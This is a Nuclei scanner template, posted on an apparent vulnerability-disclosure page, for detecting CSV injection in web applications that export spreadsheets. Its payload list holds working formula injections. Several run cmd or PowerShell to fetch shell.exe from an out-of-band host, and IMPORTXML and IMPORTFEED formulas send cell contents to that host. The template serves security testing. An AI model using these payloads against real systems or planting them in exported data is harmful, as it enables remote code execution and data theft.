漏洞描述
A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications.
csv-injection: CSV Injection Detection
PoC代码[已公开]
id: csv-injection
info:
name: CSV Injection Detection
author: DhiyaneshDK,ritikchaddha
severity: medium
description: |
A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications.
tags: dast,csv,oast,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
csv_fuzz:
- "class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}"
- 'DDE ("cmd";"/C nslookup{{interactsh-url}}";"!A0")A0'
- "@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0"
- "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0"
- "=cmd|' /C nslookup{{interactsh-url}}'!'A1'"
- "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0"
- '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")'
- '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))'
- '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)'
- '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{csv_fuzz}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: header
words:
- "text/csv"
- "application/csv"
- "application/vnd.ms-excel"
# digest: 480a0045304302204b04df532ec328b11991f3ce6db6e0f23ecf716ea56920967543344970fa6a63021f625b58f16210ea97db1831d0ba77a0c027c8687c9b4f9bca4ad0fdc0e0fc1f:922c64590222798bb761d5b6d8e72950